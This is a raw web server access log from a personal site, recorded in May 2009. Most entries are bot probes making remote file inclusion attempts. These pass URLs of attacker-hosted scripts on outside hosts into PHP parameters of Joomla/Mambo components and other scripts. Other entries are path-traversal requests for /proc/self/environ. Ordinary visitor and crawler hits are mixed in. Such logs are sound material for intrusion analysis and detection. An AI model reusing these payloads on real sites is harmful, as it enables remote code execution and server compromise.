65.98.59.178 - - [19/May/2009:11:08:46 -0700] "GET /logs/access_080211.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.98.222.18 - - [19/May/2009:11:08:50 -0700] "GET /logs/home.php?index=http://pacificdecor.org/vnc/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.98.222.18 - - [19/May/2009:11:08:50 -0700] "GET /logs/access_090506.log%20%20/home.php?index=http://pacificdecor.org/vnc/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.98.222.18 - - [19/May/2009:11:08:50 -0700] "GET /home.php?index=http://pacificdecor.org/vnc/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.98.59.178 - - [19/May/2009:11:08:51 -0700] "GET /logs/access_080923.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [19/May/2009:11:08:53 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
72.52.230.168 - - [19/May/2009:11:08:56 -0700] "GET /logs/access_080918.log%20%20/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.98.222.18 - - [19/May/2009:11:09:04 -0700] "GET /logs/access_090403.log%20%20/home.php?index=http://pacificdecor.org/vnc/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [19/May/2009:11:09:07 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
88.191.103.144 - - [19/May/2009:11:09:09 -0700] "GET /logs/access_080918.log%20%20/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.98.222.18 - - [19/May/2009:11:09:09 -0700] "GET /logs/access_090507.log/home.php?index=http://pacificdecor.org/vnc/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.98.222.18 - - [19/May/2009:11:09:09 -0700] "GET /home.php?index=http://pacificdecor.org/vnc/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.98.222.18 - - [19/May/2009:11:09:09 -0700] "GET /logs/home.php?index=http://pacificdecor.org/vnc/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [19/May/2009:11:09:15 -0700] "HEAD /blog/wp-cron.php?check=0e2d9f8f249ca15a02717d213606e9a2 HTTP/1.0" 200 0 "-" "WordPress/2.7.1" "dmulk.com"
209.175.180.194 - - [19/May/2009:11:09:16 -0700] "GET /index2.php?s=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.175.180.194 - - [19/May/2009:11:09:16 -0700] "GET /logs/index2.php?s=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.175.180.194 - - [19/May/2009:11:09:16 -0700] "GET /logs/access_080131.log/index2.php?s=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.110.19.178 - - [19/May/2009:11:09:17 -0700] "GET /logs/access_080619.log//include/bbs.lib.inc.php?site_path=http://jasek1.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.110.19.178 - - [19/May/2009:11:09:17 -0700] "GET /include/bbs.lib.inc.php?site_path=http://jasek1.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.110.19.178 - - [19/May/2009:11:09:17 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://jasek1.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.110.19.178 - - [19/May/2009:11:09:21 -0700] "GET /logs/access_080925.log//include/bbs.lib.inc.php?site_path=http://jasek1.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.17.132.115 - - [19/May/2009:11:09:25 -0700] "GET /logs/access_080521.log/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://voo.owned.lt/sp/tc.v? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.17.132.115 - - [19/May/2009:11:09:26 -0700] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://voo.owned.lt/sp/tc.v? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.17.132.115 - - [19/May/2009:11:09:26 -0700] "GET /logs/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://voo.owned.lt/sp/tc.v? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.76.47.224 - - [19/May/2009:11:09:31 -0700] "GET /?includedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 42153 "-" "libwww-perl/5.805" "www.dmulk.com"
209.17.132.115 - - [19/May/2009:11:09:32 -0700] "GET /logs/access_080321.log/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://voo.owned.lt/sp/tc.v? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.217.216.86 - - [19/May/2009:11:09:35 -0700] "GET /logs/access_080403.log//index.php?option=com_registration&&Itemid=&mosConfig_absolute_path=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.217.216.86 - - [19/May/2009:11:09:35 -0700] "GET /logs//index.php?option=com_registration&&Itemid=&mosConfig_absolute_path=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.175.180.194 - - [19/May/2009:11:09:38 -0700] "GET /logs/access_080131.log%20%20/index2.php?s=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.110.19.178 - - [19/May/2009:11:09:40 -0700] "GET /logs/access_080619.log//include/bbs.lib.inc.php?site_path=http://jasek1.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.110.19.178 - - [19/May/2009:11:09:40 -0700] "GET /include/bbs.lib.inc.php?site_path=http://jasek1.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.110.19.178 - - [19/May/2009:11:09:40 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://jasek1.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.157.225.65 - - [19/May/2009:11:09:40 -0700] "GET /logs/access_090224.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://pallmall8.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.157.225.65 - - [19/May/2009:11:09:40 -0700] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://pallmall8.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.17.132.115 - - [19/May/2009:11:09:42 -0700] "GET /logs/access_080521.log/adxmlrpc.php HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.110.19.178 - - [19/May/2009:11:09:44 -0700] "GET /logs/access_080925.log//include/bbs.lib.inc.php?site_path=http://jasek1.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.157.225.65 - - [19/May/2009:11:09:48 -0700] "GET /logs/access_090224.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://pallmall8.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.157.225.65 - - [19/May/2009:11:09:48 -0700] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://pallmall8.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.17.132.115 - - [19/May/2009:11:09:53 -0700] "GET /logs/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://voo.owned.lt/sp/tc.v? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.175.180.194 - - [19/May/2009:11:09:53 -0700] "GET /logs/access_080131.log%20%20/index2.php?s=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.17.132.115 - - [19/May/2009:11:09:53 -0700] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://voo.owned.lt/sp/tc.v? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.157.225.65 - - [19/May/2009:11:09:53 -0700] "GET /logs/access_081127.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://pallmall8.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.157.225.65 - - [19/May/2009:11:09:55 -0700] "GET /logs/access_090224.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://pallmall8.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.157.225.65 - - [19/May/2009:11:09:55 -0700] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://pallmall8.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.157.225.65 - - [19/May/2009:11:09:57 -0700] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://pallmall8.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.157.225.65 - - [19/May/2009:11:09:57 -0700] "GET /logs/access_090224.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://pallmall8.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.157.225.65 - - [19/May/2009:11:09:57 -0700] "GET /logs/access_081127.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://pallmall8.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.157.225.65 - - [19/May/2009:11:09:59 -0700] "GET /logs/access_081127.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://pallmall8.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.157.225.65 - - [19/May/2009:11:09:59 -0700] "GET /logs/access_081023.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://pallmall8.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.46.92.19 - - [19/May/2009:11:10:02 -0700] "GET /retreat1/IMG_2718.JPG HTTP/1.1" 200 2654026 "-" "LWP::Simple/5.814" "dmulk.com"
72.30.65.24 - - [19/May/2009:11:10:07 -0700] "GET /blog/index.php/category/uncategorized/ HTTP/1.0" 200 8212 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
121.165.73.157 - - [19/May/2009:11:10:14 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [19/May/2009:11:10:14 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.129.119.47 - - [19/May/2009:11:10:14 -0700] "GET /blog/index.php/2008/10/09/so-this-guy-walks-into-a-bank-10908/trackback/ HTTP/1.0" 200 14025 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "dmulk.com"
121.165.73.157 - - [19/May/2009:11:10:14 -0700] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [19/May/2009:11:10:14 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.43 - - [19/May/2009:11:10:14 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.41 - - [19/May/2009:11:10:14 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
121.165.73.157 - - [19/May/2009:11:10:26 -0700] "GET /logs/access_081107.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [19/May/2009:11:10:29 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
222.122.26.5 - - [19/May/2009:11:10:35 -0700] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.26.5 - - [19/May/2009:11:10:35 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.26.5 - - [19/May/2009:11:10:35 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [19/May/2009:11:10:37 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.41 - - [19/May/2009:11:10:37 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
64.157.4.41 - - [19/May/2009:11:10:39 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
65.23.154.225 - - [19/May/2009:11:10:40 -0700] "GET /encapscms_PATH/core/core.php?root=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
65.23.154.225 - - [19/May/2009:11:10:40 -0700] "GET /logs/encapscms_PATH/core/core.php?root=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
65.23.154.225 - - [19/May/2009:11:10:40 -0700] "GET /logs/access_080522.log/encapscms_PATH/core/core.php?root=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
65.23.154.225 - - [19/May/2009:11:10:40 -0700] "GET /errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
65.23.154.225 - - [19/May/2009:11:10:40 -0700] "GET /logs/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
65.23.154.225 - - [19/May/2009:11:10:40 -0700] "GET /logs/access_080522.log/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
65.23.154.225 - - [19/May/2009:11:10:40 -0700] "GET /encapscms_PATH/core/core.php?root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
65.23.154.225 - - [19/May/2009:11:10:40 -0700] "GET /logs/encapscms_PATH/core/core.php?root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
65.23.154.225 - - [19/May/2009:11:10:40 -0700] "GET /logs/access_080522.log/encapscms_PATH/core/core.php?root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
65.23.154.225 - - [19/May/2009:11:10:40 -0700] "GET /encapscms_PATH/core/core.php?root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
65.23.154.225 - - [19/May/2009:11:10:40 -0700] "GET /logs/encapscms_PATH/core/core.php?root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
65.23.154.225 - - [19/May/2009:11:10:40 -0700] "GET /logs/access_080522.log/encapscms_PATH/core/core.php?root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
65.23.154.225 - - [19/May/2009:11:10:41 -0700] "GET /logs/access_080426.log/encapscms_PATH/core/core.php?root=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
65.23.154.225 - - [19/May/2009:11:10:41 -0700] "GET /logs/access_080426.log/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
65.23.154.225 - - [19/May/2009:11:10:41 -0700] "GET /logs/access_080426.log/encapscms_PATH/core/core.php?root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
65.23.154.225 - - [19/May/2009:11:10:41 -0700] "GET /logs/access_080426.log/encapscms_PATH/core/core.php?root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
222.122.26.5 - - [19/May/2009:11:10:45 -0700] "GET /logs/access_081107.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.157.225.65 - - [19/May/2009:11:11:00 -0700] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://pallmall8.fileave.com/id.txt?? HTTP/1.1" 500 292 "-" "Mozilla/5.0" "www.dmulk.com"
221.157.225.65 - - [19/May/2009:11:11:00 -0700] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://pallmall8.fileave.com/id.txt?? HTTP/1.1" 500 292 "-" "Mozilla/5.0" "www.dmulk.com"
124.217.216.86 - - [19/May/2009:11:11:00 -0700] "GET /index.php?option=com_registration&&Itemid=&mosConfig_absolute_path=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 500 292 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [19/May/2009:11:11:01 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
88.191.103.144 - - [19/May/2009:11:11:11 -0700] "GET /logs/access_080923.log%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.103.144 - - [19/May/2009:11:11:11 -0700] "GET /logs/access_080211.log%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.158.248.236 - - [19/May/2009:11:11:12 -0700] "GET /logs/access_080809.log/errors.php?error=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.157.4.43 - - [19/May/2009:11:11:12 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
85.158.248.236 - - [19/May/2009:11:11:13 -0700] "GET /errors.php?error=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.158.248.236 - - [19/May/2009:11:11:13 -0700] "GET /logs/errors.php?error=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.59.178 - - [19/May/2009:11:11:21 -0700] "GET /logs/access_080211.log%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.157.225.65 - - [19/May/2009:11:11:21 -0700] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://pallmall8.fileave.com/id.txt?? HTTP/1.1" 200 - "-" "Mozilla/5.0" "www.dmulk.com"
65.98.59.178 - - [19/May/2009:11:11:22 -0700] "GET /logs/access_080923.log%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.38.181.51 - - [19/May/2009:11:11:28 -0700] "GET /logs/access_080614.log///?_SERVER[DOCUMENT_ROOT]=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.38.181.51 - - [19/May/2009:11:11:28 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 200 100197 "-" "libwww-perl/5.805" "www.dmulk.com"
221.157.225.65 - - [19/May/2009:11:11:30 -0700] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://pallmall8.fileave.com/id.txt?? HTTP/1.0" 200 - "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [19/May/2009:11:11:34 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
121.165.73.157 - - [19/May/2009:11:11:38 -0700] "GET /logs/access_081027.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.119.103.12 - - [19/May/2009:11:11:41 -0700] "GET /logs/access_080808.log//bemarket/postscript/postscript.php?p_mode=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.119.103.12 - - [19/May/2009:11:11:41 -0700] "GET /bemarket/postscript/postscript.php?p_mode=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.11.150.98 - - [19/May/2009:11:11:44 -0700] "GET /logs/access_080530.log%20%20/joomla/index.php?option=com_restaurante&task=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.11.150.98 - - [19/May/2009:11:11:44 -0700] "GET /logs/access_080603.log%20%20/joomla/index.php?option=com_restaurante&task=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [19/May/2009:11:11:44 -0700] "GET /logs/access_081107.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.38.181.51 - - [19/May/2009:11:11:45 -0700] "GET /logs/access_081025.log///?_SERVER[DOCUMENT_ROOT]=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.19 - - [19/May/2009:11:11:47 -0700] "GET /logs/access_080809.log/errors.php?error=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.19 - - [19/May/2009:11:11:48 -0700] "GET /errors.php?error=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.19 - - [19/May/2009:11:11:48 -0700] "GET /logs/errors.php?error=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.158.248.236 - - [19/May/2009:11:11:52 -0700] "GET /logs/access_080223.log/errors.php?error=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.172.92.14 - - [19/May/2009:11:12:06 -0700] "GET /logs/access_080809.log/errors.php?error=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.172.92.14 - - [19/May/2009:11:12:06 -0700] "GET /errors.php?error=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.172.92.14 - - [19/May/2009:11:12:06 -0700] "GET /logs/errors.php?error=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.135.14 - - [19/May/2009:11:12:08 -0700] "GET /logs/access_080808.log//bemarket/postscript/postscript.php?p_mode=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.135.14 - - [19/May/2009:11:12:08 -0700] "GET /bemarket/postscript/postscript.php?p_mode=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.135.14 - - [19/May/2009:11:12:09 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
